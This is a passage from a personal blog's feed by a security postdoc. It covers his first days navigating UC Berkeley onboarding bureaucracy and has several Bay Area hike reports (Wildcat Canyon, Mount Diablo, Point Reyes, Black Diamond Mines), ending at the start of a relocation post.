</content><category term="Academia"></category><category term="PostDoc"></category><category term="research"></category><category term="howto"></category><category term="PhD"></category><category term="science"></category></entry><entry><title>Bootstrapping at UC Berkeley</title><link href="/blog/2012/0917-bootstrapping-at-uc-berkeley.html" rel="alternate"></link><published>2012-09-17T17:51:00-04:00</published><updated>2012-09-17T17:51:00-04:00</updated><author><name>Mathias Payer</name></author><id>tag:None,2012-09-17:/blog/2012/0917-bootstrapping-at-uc-berkeley.html</id><summary type="html">&lt;p&gt;Today I had my first day at UC Berkeley in &lt;a class="reference external" href="http://www.cs.berkeley.edu/~dawnsong/"&gt;Dawn Song&lt;/a&gt;'s group and I
must say that it was quite an intense day! Most of the time went into
going through all the bureaucratic processes here at Berkeley. I always
thought that ETH Zurich was bad, but the …&lt;/p&gt;</summary><content type="html">&lt;p&gt;Today I had my first day at UC Berkeley in &lt;a class="reference external" href="http://www.cs.berkeley.edu/~dawnsong/"&gt;Dawn Song&lt;/a&gt;'s group and I
must say that it was quite an intense day! Most of the time went into
going through all the bureaucratic processes here at Berkeley. I always
thought that ETH Zurich was bad, but the bureaucratic pain at ETH is
peanuts compared to bureaucracy here at Berkeley.&lt;/p&gt;
&lt;p&gt;The bureaucratic pain started about 3 weeks ago when I got an email
that I had to attend a special Berkeley Visa meeting (also called a &lt;a class="reference external" href="http://internationaloffice.berkeley.edu/profs_researchers/scholar_information_meetings"&gt;SIM&lt;/a&gt;
meeting). The meeting was on the following day (when we were still on
holiday). So I rushed up to the International House and attended this
meeting. Before the presentation we were handed a booklet and had to
register with our passports and DS-2019s. Attending the presentation is
mandatory and you only get your travel authorization (if you want to
travel during your J1 PostDoc) if you attend this meeting. So I waited
in the auditorium and read the booklet. Twice. And the presentation
covered the material in the booklet at a glacial pace
(i.e., very detailed and precise so that everybody would get it).&lt;/p&gt;
&lt;p&gt;On my first day I had an appointment with &lt;a class="reference external" href="http://www.erso.berkeley.edu/"&gt;ERSO&lt;/a&gt; to get my contract set
and settled. As a typical Swiss I arrived at five to nine and was greeted
with a warm welcome. Unfortunately the person I had an appointment with
had her day off, so I was handled by somebody else. All in all I had to
fill out around 15 forms, enter my personal information about 10 times,
and sign the documents 12 times or so. This process took half an hour and
got me a Berkeley employee ID (which will be needed later on).&lt;/p&gt;
&lt;p&gt;The next step was meeting with the awesome Barbara Goto from Dawn
Song's group, who handles access to the offices and hardware
distribution. So I signed in
with her and we went to the building administration to get me a key for
the office (where I had to pay a 5$ deposit).&amp;nbsp;To get access on the
(wired and wireless) network you need an EECS account, administered by
&lt;a class="reference external" href="https://iris.eecs.berkeley.edu/"&gt;IRIS&lt;/a&gt;. So I went back to Cory Hall to talk to the IRIS guys and got
myself registered. The registration is a 3-step process: you register,
your PI signs it off, and you re-register and authenticate yourself
using your Cal ID.&lt;/p&gt;
&lt;p&gt;When I returned from IRIS&amp;nbsp;&lt;a class="reference external" href="https://www.online-tax.net/"&gt;Glacier&lt;/a&gt;&amp;nbsp;had sent me an email that my
employee ID had gone through the first system and that I needed to fill
out some (online) forms. So off I went. For taxation Glacier needed all
my visits _ever_ to the US with exact date and length of stay (which
is almost double digits in my case and a pain to enter on their
website). To fill out these forms you need your DS-2019 and your
position code which is available on your contract.&lt;/p&gt;
&lt;p&gt;Now I would also like to have a Cal ID, which is the main form of
authentication for campus services. Unfortunately I have to wait two days
until all the forms I just filled out have rippled through the nightly
batch jobs and are processed by the different systems. To get the Cal ID
you need your employee number as well, but with the Cal ID you get access
to the recreational sport facilities, AC transit (bus) passes, and much
more. That concludes the bureaucratic nightmare of my first day; it was
already past noon and I had not yet talked to the other guys here.&lt;/p&gt;
&lt;p&gt;My next point on the list was a quick meeting with Dawn who pointed me
to Lenx to get all the necessary information. Lenx filled me in on all
the currently running projects and told me when the group meetings are.
Basically: ask your group members to get on all the mailing lists and to
get access to the internal wikis, the GIT repositories, and the SVN. Then
I was also told to order laptops and desktops. Dawn offered me one of
these Retina MacBook Pro laptops, but I declined and opted for another
Lenovo: this time I'll get an X230 with 24 hours of battery life and
less than 3lb (1.3kg) of weight, compared to the 6 hours of battery life
and 4.4lb (2kg) of the MacBook Pro. A conference laptop should be
lightweight and should last through the regular conference day, so travel
light, travel energy efficient!&lt;/p&gt;
&lt;p&gt;Now I'm looking forward to what the next day will bring! :)&lt;/p&gt;
&lt;div class="section" id="addendum"&gt;
&lt;h2&gt;Addendum&lt;/h2&gt;
&lt;p&gt;It's now Thursday and I hope to have finished all the bureaucratic stuff
that I had to do. Basically you need to get an employee ID (at the ERSO
office). The employee ID registers you in all the major databases and
kick-starts your payroll. Then you have to register your tax services at
Glacier to ensure correct taxation of your payroll, you need to setup
accounts and fill out all the online forms at &lt;a class="reference external" href="https://atyourserviceonline.ucop.edu/ayso/"&gt;AYSO&lt;/a&gt;&amp;nbsp;and&amp;nbsp;&lt;a class="reference external" href="http://blu.is.berkeley.edu/"&gt;BLU&lt;/a&gt;; these
four services (ERSO, AYSO, Glacier, and BLU) ensure your payroll.&amp;nbsp;After
that you need to go to &lt;a class="reference external" href="http://www.garnett-powers.com/postdoc/"&gt;Garnett-Powers&lt;/a&gt; to select a health-care plan.
If you (and your wife) have a social security number you might be able to
fill out the form online at AYSO. Otherwise you need to go to the
Garnett-Powers homepage and fill out the online form, print it, and hand
it over to the ERSO guys.&lt;/p&gt;
&lt;p&gt;The next step is to generate an IRIS account so that you get an email
account, can log on to the internal (wired and wireless) network, and can
register devices. You have to go there to create an account, wait until
your account is approved, and go there a second time to set all your
passwords. The IRIS account depends on your employee number.
For a bunch of other services you will need a Cal1Card. You have to wait
1-2 days until all the data is batch processed, then you'll have to go
to the Cal1Card office (at the student services) which will then issue
your PostDoc ID card plus an account token. With your employee number
and the account token you'll be able to generate a Cal1 account. The
Cal1Card depends on your employee number.&lt;/p&gt;
&lt;p&gt;All in all it took me 3 days to fill out all the forms and to wait until
the state of my account was batch processed to completion. Sigh, and I
always thought that ETH was inefficient and bureaucratic.&lt;/p&gt;
&lt;/div&gt;
</content><category term="Academia"></category><category term="PostDoc"></category><category term="Berkeley"></category><category term="bureaucracy"></category></entry><entry><title>Wildcat Canyon hike</title><link href="/blog/2012/0915-wildcat-canyon-hike.html" rel="alternate"></link><published>2012-09-15T21:31:00-04:00</published><updated>2012-09-15T21:31:00-04:00</updated><author><name>Mathias Payer</name></author><id>tag:None,2012-09-15:/blog/2012/0915-wildcat-canyon-hike.html</id><summary type="html">&lt;p&gt;During the long and strenuous hike in Mount Diablo state park my hiking
boots broke and fell apart. The plastic sole apparently lost its
flexibility and completely disintegrated. So we had to buy new hiking
shoes at &lt;a class="reference external" href="http://www.rei.com/"&gt;REI&lt;/a&gt;. As you could have guessed the only model that actually
fit my …&lt;/p&gt;</summary><content type="html">&lt;p&gt;During the long and strenuous hike in Mount Diablo state park my hiking
boots broke and fell apart. The plastic sole apparently lost its
flexibility and completely disintegrated. So we had to buy new hiking
shoes at &lt;a class="reference external" href="http://www.rei.com/"&gt;REI&lt;/a&gt;. As you could have guessed the only model that actually
fit my feet was the most expensive Salomon model for 230$. On the other
hand, the old pair of boots lasted for more than 10 years, so it's not
that bad.
To break the new boots in we decided to head off to an easy hike this
Saturday, covering only a couple of miles and (almost) no elevation
gain. Wildcat Canyon is a regional park close to Albany and only a 15min
drive away. On the plus side we had time for a couple of GeoCaches on
the way!&amp;nbsp;If you have kids: plan a long stop at Little Farm; there are
tons of (farm) animals walking around that your kids can pet and look
at. The hike is easy, we brought around 1/4 gallon (1l) of water per
person.&lt;/p&gt;
&lt;div class="section" id="trail-navigation"&gt;
&lt;h2&gt;Trail navigation&lt;/h2&gt;
&lt;p&gt;We parked near Little Farm and started on the Loop road and headed off
towards Laurel Canyon trail. The Laurel Canyon trail ends at Nimitz road
which is an easy fire road along the rim of Wildcat canyon. Near the
second GeoCache we headed off from the trail and went up a little hill.
The hill offered a perfect view of the bay area, San Francisco, the
Golden Gate bridge, and Sausalito. We then followed the Meadows Canyon
trail back to Little Farm and to our parking lot.
&lt;a class="reference external" href="http://osm.quelltextlich.at/viewer-js.html?kml_url=http:%2F%2Fnebelwelt.net%2Fgpslogs%2F20120915-Wildcat_Canyon.kml"&gt;View Map&lt;/a&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="hike-description"&gt;
&lt;h2&gt;Hike description&lt;/h2&gt;
&lt;p&gt;The hike is an easy Saturday stroll of around 6.2mi (10km) with
negligible elevation gain. Most of the hike is on paved or unpaved fire
roads with some stretches on trails. If you want to follow our hike make
sure to check the map above to discover the right place where you have
to break out for the most awesome view of the bay area ever.&lt;/p&gt;
&lt;p&gt;&lt;img alt="image0" src="/blog/static/2012/0915/wildcat_canyon_profile.png" /&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="picture-time"&gt;
&lt;h2&gt;Picture time&lt;/h2&gt;
&lt;p&gt;The pictures were taken during the hike and show some of the best
views from the top of the little hill plus some shots after we
found the GeoCaches.&lt;/p&gt;
&lt;p&gt;&lt;img alt="image1" src="/blog/static/2012/0915/DSCF4486.JPG" /&gt;&lt;/p&gt;
&lt;p&gt;Short stop on Nimitz road.&lt;/p&gt;
&lt;p&gt;&lt;img alt="image2" src="/blog/static/2012/0915/DSCF4490.JPG" /&gt;&lt;/p&gt;
&lt;p&gt;View from Nimitz road.&lt;/p&gt;
&lt;p&gt;&lt;img alt="image3" src="/blog/static/2012/0915/DSCF4492.JPG" /&gt;&lt;/p&gt;
&lt;p&gt;View from Nimitz road.&lt;/p&gt;
&lt;p&gt;&lt;img alt="image4" src="/blog/static/2012/0915/DSCF4494.JPG" /&gt;&lt;/p&gt;
&lt;p&gt;View from top of the hill into the back country.&lt;/p&gt;
&lt;p&gt;&lt;img alt="image5" src="/blog/static/2012/0915/DSCF4495.JPG" /&gt;&lt;/p&gt;
&lt;p&gt;View from top of the hill into the back country. The amazing mountain in
the back is &lt;a class="reference external" href="http://secnerdtravels.blogspot.com/2012/09/mount-diablo-state-park.html"&gt;Mount Diablo&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;&lt;img alt="image6" src="/blog/static/2012/0915/DSCF4499.JPG" /&gt;&lt;/p&gt;
&lt;p&gt;View from top of the hill towards San Francisco and the Golden Gate
bridge.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="summary"&gt;
&lt;h2&gt;Summary&lt;/h2&gt;
&lt;p&gt;The hike was basically a nice Saturday stroll that gave us the
opportunity to visit a couple of GeoCaches. The area is nice but
frequented by many walkers, runners, bikers, and strollers. So if you want
the quiet nature reserve experience then this is not the right park. On
the other hand if you are looking for a quick escape from day to day
troubles then this is the right place to go!&lt;/p&gt;
&lt;/div&gt;
</content><category term="Leisure"></category><category term="easy hike"></category><category term="day hike"></category><category term="GeoCache"></category><category term="view"></category></entry><entry><title>Mount Diablo State Park</title><link href="/blog/2012/0913-mount-diablo-state-park.html" rel="alternate"></link><published>2012-09-13T21:18:00-04:00</published><updated>2012-09-13T21:18:00-04:00</updated><author><name>Mathias Payer</name></author><id>tag:None,2012-09-13:/blog/2012/0913-mount-diablo-state-park.html</id><summary type="html">&lt;p&gt;When we visited the &lt;a class="reference external" href="http://secnerdtravels.blogspot.com/2012/09/black-diamond-mines-regional-reserve.html"&gt;Black Diamond Mines regional reserve&lt;/a&gt; the ranger
told us a bit about Mount Diablo. Mount Diablo is a pretty young
mountain and when it rose all the geological features of the area
changed. In the Black Diamond Mines you can observe that the different
geological layers …&lt;/p&gt;</summary><content type="html">&lt;p&gt;When we visited the &lt;a class="reference external" href="http://secnerdtravels.blogspot.com/2012/09/black-diamond-mines-regional-reserve.html"&gt;Black Diamond Mines regional reserve&lt;/a&gt; the ranger
told us a bit about Mount Diablo. Mount Diablo is a pretty young
mountain and when it rose all the geological features of the area
changed. In the Black Diamond Mines you can observe that the different
geological layers are tilted and they all rise towards Mount Diablo. The
ranger got us interested and we wanted to explore the area for
ourselves. So we headed off to Mount Diablo State Park for a strenuous
hike. According to the hike reviews on the web the most interesting hike
is the so called &amp;quot;grand loop&amp;quot; that starts halfway up to the top of Mount
Diablo and goes completely around it, covering three different peaks on
the way.&lt;/p&gt;
&lt;p&gt;The official &amp;quot;map&amp;quot; for this state park is really bad: many trails are
not on the map, the scale is too coarse grained, and the trail heads
are not marked well. My advice is to bring a GPS (e.g., a Garmin) with
the OpenStreetMap maps of California. These maps include all trails of
the state park and will help you during your hike.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Health warning&lt;/strong&gt;: you are exposed to direct sun light through most of
the hike plus it is super hot, even in September. Bring plenty of water
(at least 3/4 of a gallon - 3l per person).&lt;/p&gt;
&lt;div class="section" id="trail-navigation"&gt;
&lt;h2&gt;Trail navigation&lt;/h2&gt;
&lt;p&gt;The trail head is located right next to Juniper campground; there is
plenty of parking (10$) available at the campground. This hike is
a grand loop around Mount Diablo with three peaks that you can climb.
Depending on your condition you can do one, two, or all three peaks.
Follow Deer Flat road to Meridian Ridge road. The first peak you can
climb is Eagle peak (follow Eagle Peak trail), which offers a nice view
of the area and some old open mining regions. When returning from Eagle
Peak trail take the Bald Ridge trail to get to the trail head to the
second peak. North peak is reached via North Peak road after a steep
incline of around 0.8mi (1.2km) and the view is so-so. The peak is mostly
covered by mobile and satellite antennas which tend to spoil the
atmosphere. Backtrack to the end of Bald Ridge trail and continue on
the North Peak trail until you reach Summit trail. Summit trail takes
you up to the final peak: Mount Diablo. The last peak offers the best
views: you can see for up to 200 miles into the different California
regions and you'll even see downtown San Francisco. Backtrack using
Summit trail and follow Juniper trail to the parking lot. Watch out: the
trail head of Juniper trail is hard to find.
&lt;a class="reference external" href="http://osm.quelltextlich.at/viewer-js.html?kml_url=http:%2F%2Fnebelwelt.net%2Fgpslogs%2F20120913-Mount_Diablo_State_Park.kml"&gt;View Map&lt;/a&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="hike-description"&gt;
&lt;h2&gt;Hike description&lt;/h2&gt;
&lt;p&gt;The length of the hike is only around 10 miles (~16.3km) with ~3680ft
(1120m) elevation gain. The hike is very strenuous as you are exposed to
the sun most of the time and Mount Diablo lives up to its name. The
amazing parts of this hike are walking along the ridge to Eagle
peak, the steep incline up to North peak, and the magnificent views from
Mount Diablo.&lt;/p&gt;
&lt;p&gt;&lt;img alt="image0" src="/blog/static/2012/0913/mount_diablo_profile.png" /&gt;&lt;/p&gt;
&lt;p&gt;The height profile shows the decline from the parking lot and the
inclines to Eagle peak (2nd peak in the picture), North peak (3rd peak),
and Mount Diablo (4th peak).&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="picture-time"&gt;
&lt;h2&gt;Picture time&lt;/h2&gt;
&lt;p&gt;Some pictures that we took on the way up.&lt;/p&gt;
&lt;p&gt;&lt;img alt="image1" src="/blog/static/2012/0913/DSCF4463.JPG" /&gt;&lt;/p&gt;
&lt;p&gt;On the Deer Flat road, behind us is the Juniper campground&lt;/p&gt;
&lt;p&gt;&lt;img alt="image2" src="/blog/static/2012/0913/DSCF4469.JPG" /&gt;&lt;/p&gt;
&lt;p&gt;After locating a GeoCache.&lt;/p&gt;
&lt;p&gt;&lt;img alt="image3" src="/blog/static/2012/0913/DSCF4471.JPG" /&gt;&lt;/p&gt;
&lt;p&gt;Exhausted on Eagle peak.&lt;/p&gt;
&lt;p&gt;&lt;img alt="image4" src="/blog/static/2012/0913/DSCF4472.JPG" /&gt;&lt;/p&gt;
&lt;p&gt;View from Eagle peak.&lt;/p&gt;
&lt;p&gt;&lt;img alt="image5" src="/blog/static/2012/0913/DSCF4473.JPG" /&gt;&lt;/p&gt;
&lt;p&gt;On the way to Mount Diablo.&lt;/p&gt;
&lt;p&gt;&lt;img alt="image6" src="/blog/static/2012/0913/DSCF4474.JPG" /&gt;&lt;/p&gt;
&lt;p&gt;View from the top.&lt;/p&gt;
&lt;p&gt;&lt;img alt="image7" src="/blog/static/2012/0913/DSCF4478.JPG" /&gt;&lt;/p&gt;
&lt;p&gt;View towards South.&lt;/p&gt;
&lt;p&gt;&lt;img alt="image8" src="/blog/static/2012/0913/DSCF4479.JPG" /&gt;&lt;/p&gt;
&lt;p&gt;View towards North peak.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="summary"&gt;
&lt;h2&gt;Summary&lt;/h2&gt;
&lt;p&gt;Overall I would classify this hike as a strenuous 6 hour day hike. The
three different peaks are the great highlights of this trip. If you get
tired on the way you can easily leave out some of the peaks (skip North
peak first, as it is only special because of the steep incline at the
end). Make sure to bring plenty of water on the hike, otherwise you'll
dry out in the heat!&lt;/p&gt;
&lt;/div&gt;
</content><category term="Leisure"></category><category term="day hike"></category><category term="GeoCache"></category><category term="view"></category><category term="strenuous"></category></entry><entry><title>Point Reyes National Seashore</title><link href="/blog/2012/0911-point-reyes-national-seashore.html" rel="alternate"></link><published>2012-09-11T18:30:00-04:00</published><updated>2012-09-11T18:30:00-04:00</updated><author><name>Mathias Payer</name></author><id>tag:None,2012-09-11:/blog/2012/0911-point-reyes-national-seashore.html</id><summary type="html">&lt;p&gt;After some time in the national parks we wanted to explore the national
seashore as well. &lt;a class="reference external" href="http://www.nps.gov/pore/index.htm"&gt;Point Reyes&lt;/a&gt; is pretty close to us and the reviews
sounded as if the park could be fun! The drive from Albany to Point Reyes
was around 1hr in early morning traffic, not too …&lt;/p&gt;</summary><content type="html">&lt;p&gt;After some time in the national parks we wanted to explore the national
seashore as well. &lt;a class="reference external" href="http://www.nps.gov/pore/index.htm"&gt;Point Reyes&lt;/a&gt; is pretty close to us and the reviews
sounded as if the park could be fun! The drive from Albany to Point Reyes
took around 1hr in early morning traffic - not too bad, but the road was
in bad shape and we had to drive carefully. Again we packed our bagels
and around 2l of water per person.&lt;/p&gt;
&lt;div class="section" id="trail-navigation"&gt;
&lt;h2&gt;Trail navigation&lt;/h2&gt;
&lt;p&gt;We started off from the Bear Valley visitor center where we got a map
and great information. From the Bear Valley visitor center we followed
the Horse trail up into the high lands and continued on Sky trail until
we hit Coast trail with a&amp;nbsp;magnificent view. We then followed the Bear
Valley&amp;nbsp;trail back to the Bear Valley visitor center and finally to our
car.
&lt;a class="reference external" href="http://osm.quelltextlich.at/viewer-js.html?kml_url=http:%2F%2Fnebelwelt.net%2Fgpslogs%2F20120911-Point_Reyes_National_Park.kml"&gt;View Map&lt;/a&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="hike-description"&gt;
&lt;h2&gt;Hike description&lt;/h2&gt;
&lt;p&gt;The hike was awesome, we enjoyed the dense forests, the great diversity,
and the awesome views when we got close to the coast. During most of the
time we were covered by trees and bushes, so it was neither too hot nor
too cold; close to the coast you might need a light jacket otherwise a
t-shirt is perfect. We started off with the hard part: the first part of
the hike was pretty steep: zigzagging up the Horse trail was
exhausting and we got a bit sweaty. After covering the elevation
difference the rest of the hike was a breeze, meandering down towards
the coast. The view is kind of secluded until you are close to the coast
but you can always enjoy the nature. Near the coast you have a
breathtaking view, including some cliffs.&lt;/p&gt;
&lt;p&gt;&lt;img alt="image0" src="/blog/static/2012/0911/point_reyes_profile.png" /&gt;&lt;/p&gt;
&lt;p&gt;Height profile of the complete hike.&lt;/p&gt;
&lt;p&gt;The length of the hike was around 14mi (~22.5km) with an elevation
difference of roughly 2100ft (660m). We were a bit exhausted from the
length of the hike but the difficulty is pretty low.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="picture-time"&gt;
&lt;h2&gt;Picture time&lt;/h2&gt;
&lt;p&gt;The following images show some impressions from the hike, mostly taken
on the Coast trail where the view is most impressive!&lt;/p&gt;
&lt;p&gt;&lt;img alt="image1" src="/blog/static/2012/0911/IMG_20120911_141826.jpg" /&gt;&lt;/p&gt;
&lt;p&gt;&lt;img alt="image2" src="/blog/static/2012/0911/IMG_20120911_141909.jpg" /&gt;&lt;/p&gt;
&lt;p&gt;&lt;img alt="image3" src="/blog/static/2012/0911/IMG_20120911_143218.jpg" /&gt;&lt;/p&gt;
&lt;p&gt;&lt;img alt="image4" src="/blog/static/2012/0911/IMG_20120911_144950.jpg" /&gt;&lt;/p&gt;
&lt;p&gt;&lt;img alt="image5" src="/blog/static/2012/0911/IMG_20120911_145358.jpg" /&gt;&lt;/p&gt;
&lt;div class="section" id="summary"&gt;
&lt;h3&gt;Summary&lt;/h3&gt;
&lt;p&gt;This is an awesome 6 hour day hike. There are plenty of areas where
you can rest and enjoy the view. Most of the trails are covered by trees
and bushes, so the heat is not too bad. The views along the coast are
breathtaking.&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
</content><category term="Leisure"></category><category term="day hike"></category><category term="long day hike"></category><category term="view"></category><category term="strenuous"></category></entry><entry><title>Black Diamond Mines Regional Reserve</title><link href="/blog/2012/0908-black-diamond-mines-regional-reserve.html" rel="alternate"></link><published>2012-09-08T21:43:00-04:00</published><updated>2012-09-08T21:43:00-04:00</updated><author><name>Mathias Payer</name></author><id>tag:None,2012-09-08:/blog/2012/0908-black-diamond-mines-regional-reserve.html</id><summary type="html">&lt;p&gt;Our first hike from our new home location was in &lt;a class="reference external" href="http://www.ebparks.org/parks/black_diamond"&gt;Black Diamond Mines
Regional Reserve&lt;/a&gt;. We planned the hike one day before, bought enough
food (two bagels for me, one bagel for Lumi, fruits, and some sweets)
and around 3l of fluids. The drive took less than an hour from …&lt;/p&gt;</summary><content type="html">&lt;p&gt;Our first hike from our new home location was in &lt;a class="reference external" href="http://www.ebparks.org/parks/black_diamond"&gt;Black Diamond Mines
Regional Reserve&lt;/a&gt;. We planned the hike one day before, bought enough
food (two bagels for me, one bagel for Lumi, fruits, and some sweets)
and around 3l of fluids. The drive took less than an hour from Albany,
CA and parking costs 5$.&lt;/p&gt;
&lt;div class="section" id="trail-navigation-and-hike-description"&gt;
&lt;h2&gt;Trail navigation and hike description&lt;/h2&gt;
&lt;p&gt;Unfortunately we forgot our GPS at home, so this post only contains a
description of the hike without height profile and detailed GPS log.&amp;nbsp;We
started off from the visitor center (&lt;a class="reference external" href="http://www.ebparks.org/Assets/files/parks/black_diamond/black_diamond_2250w_32c.gif"&gt;map&lt;/a&gt;) and the trail head of the
Chapparral trail which then turned into the Manhattan Canyon trail.
After the short and steep incline we continued on the Black Diamond
trail where we enjoyed the view and stopped at the airshaft and at Jim's
place. Both places were just holes in the ground and not that
interesting. The trail continued to the Coal Canyon trail which led us
to Nortonville (an old mine city that is now deserted, unfortunately the
early settlers took all the wood and iron with them, so there is not
much left of the city). Later we continued to Rose Hill Cemetery and
back to the picnic area where we had our late lunch.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="picture-time"&gt;
&lt;h2&gt;Picture time&lt;/h2&gt;
&lt;p&gt;The following pictures were taken during our Black Diamond hike.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external image-reference" href="/blog/static/2012/0908/IMG_4088.JPG"&gt;&lt;img alt="image0" src="/blog/static/2012/0908/IMG_4088.JPG" style="width: 800px;" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;View of Summerville.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external image-reference" href="/blog/static/2012/0908/IMG_4092.JPG"&gt;&lt;img alt="image1" src="/blog/static/2012/0908/IMG_4092.JPG" style="width: 800px;" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external image-reference" href="/blog/static/2012/0908/IMG_4097.JPG"&gt;&lt;img alt="image2" src="/blog/static/2012/0908/IMG_4097.JPG" style="width: 800px;" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;The old airshaft.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external image-reference" href="/blog/static/2012/0908/IMG_4109.JPG"&gt;&lt;img alt="image3" src="/blog/static/2012/0908/IMG_4109.JPG" style="width: 800px;" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Lumi tries to hide.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external image-reference" href="/blog/static/2012/0908/IMG_4110.JPG"&gt;&lt;img alt="image4" src="/blog/static/2012/0908/IMG_4110.JPG" style="width: 800px;" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;The Rose Hill cemetery.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="special-detour-entering-the-mine"&gt;
&lt;h2&gt;Special detour: entering the mine&lt;/h2&gt;
&lt;p&gt;After our lunch we went to the Hazel Atlas mine for the grand tour.
While we waited for the tour to start we strolled to the nearby
gunpowder depot and accidentally found a GeoCache. The tour of the
mine was very interesting, although they only showed us the silica mine
that was mined to gather resources to make glass. The black diamond
(coal) mine is closed to the public due to structural instabilities.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external image-reference" href="/blog/static/2012/0908/IMG_4117.JPG"&gt;&lt;img alt="image5" src="/blog/static/2012/0908/IMG_4117.JPG" style="width: 800px;" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;The above image was taken at the entrance of the silica mine. The image
shows a collapsed part of the coal mine. The little dark layer in the
middle is all that is left from a coal mine shaft after the coal has
been mined. This is the reason why the remaining parts of the coal mine
are not open to the public. The silica mine is structurally more stable
and is therefore open to the public.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external image-reference" href="/blog/static/2012/0908/IMG_4121.JPG"&gt;&lt;img alt="image6" src="/blog/static/2012/0908/IMG_4121.JPG" style="width: 800px;" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;The above image shows the view into one of the cross shafts from the
main tunnel.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external image-reference" href="/blog/static/2012/0908/IMG_4125.JPG"&gt;&lt;img alt="image7" src="/blog/static/2012/0908/IMG_4125.JPG" style="width: 800px;" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;The pictures above and below show old trains used to transport the
silica out of the tunnel.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external image-reference" href="/blog/static/2012/0908/IMG_4126.JPG"&gt;&lt;img alt="image8" src="/blog/static/2012/0908/IMG_4126.JPG" style="width: 800px;" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external image-reference" href="/blog/static/2012/0908/IMG_4127.JPG"&gt;&lt;img alt="image9" src="/blog/static/2012/0908/IMG_4127.JPG" style="width: 800px;" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;The above picture shows me touching the fault line that runs in the
tunnels below. Amazing feeling!&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external image-reference" href="/blog/static/2012/0908/IMG_4130.JPG"&gt;&lt;img alt="image10" src="/blog/static/2012/0908/IMG_4130.JPG" style="width: 800px;" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Another picture into a side tunnel that was used to dig out the silica.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external image-reference" href="/blog/static/2012/0908/IMG_4136.JPG"&gt;&lt;img alt="image11" src="/blog/static/2012/0908/IMG_4136.JPG" style="width: 800px;" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;The picture above shows the control room (or a replica thereof) with all
the old utilities and the old work desk.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="summary"&gt;
&lt;h2&gt;Summary&lt;/h2&gt;
&lt;p&gt;All in all we enjoyed this fun hike and had a great time. The mine tour
made it very interesting as well; the last time I visited a mine was as
a kid! This hike is great for families too, maybe limit yourselves to
only the shorter loop, or up to the cemetery - the kids can play during
the hike and then enjoy the mine tour. Explore the park and the mines!&lt;/p&gt;
&lt;/div&gt;
&lt;/content&gt;&lt;category term="Leisure"&gt;&lt;/category&gt;&lt;category term="day hike"&gt;&lt;/category&gt;&lt;category term="GeoCache"&gt;&lt;/category&gt;&lt;category term="side quest"&gt;&lt;/category&gt;&lt;category term="mine"&gt;&lt;/category&gt;&lt;category term="view"&gt;&lt;/category&gt;&lt;category term="medium day hike"&gt;&lt;/category&gt;&lt;/entry&gt;&lt;entry&gt;&lt;title&gt;An expat's start as a security postdoc at UC Berkeley&lt;/title&gt;&lt;link href="/blog/2012/0902-an-expats-start-as-a-security-postdoc-at-uc-berkeley.html" rel="alternate"&gt;&lt;/link&gt;&lt;published&gt;2012-09-02T19:10:00-04:00&lt;/published&gt;&lt;updated&gt;2012-09-02T19:10:00-04:00&lt;/updated&gt;&lt;author&gt;&lt;name&gt;Mathias Payer&lt;/name&gt;&lt;/author&gt;&lt;id&gt;tag:None,2012-09-02:/blog/2012/0902-an-expats-start-as-a-security-postdoc-at-uc-berkeley.html&lt;/id&gt;&lt;summary type="html"&gt;&amp;lt;div class="section" id="what-is-this-blog-post-all-about-aka-tl-dr"&amp;gt;
&lt;h2&gt;What is this blog post all about (aka tl;dr)?&lt;/h2&gt;
&lt;p&gt;This post covers our first two weeks in Berkeley, California and
includes our struggles to find reasonable housing, a car, pitfalls with
Visa requirements, how to get a driving license, and generally how to
start a new life in the …&lt;/p&gt;&lt;/div&gt;</summary><content type="html">&lt;div class="section" id="what-is-this-blog-post-all-about-aka-tl-dr"&gt;
&lt;h2&gt;What is this blog post all about (aka tl;dr)?&lt;/h2&gt;
&lt;p&gt;This post covers our first two weeks in Berkeley, California and
includes our struggles to find reasonable housing, a car, pitfalls with
Visa requirements, how to get a driving license, and generally how to
start a new life in the US - if all you have fits into a bag plus 1
piece of hand luggage (per person).&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="day-0-august-20st-flight-from-zurich-to-philadelphia-to-phoenix-to-oakland"&gt;
&lt;h2&gt;Day 0 (August 20th): flight from Zurich to Philadelphia to Phoenix to Oakland&lt;/h2&gt;
&lt;p&gt;When planning our emigration from Switzerland a couple of months ago we
booked the cheapest flights to Berkeley that were in a reasonable time
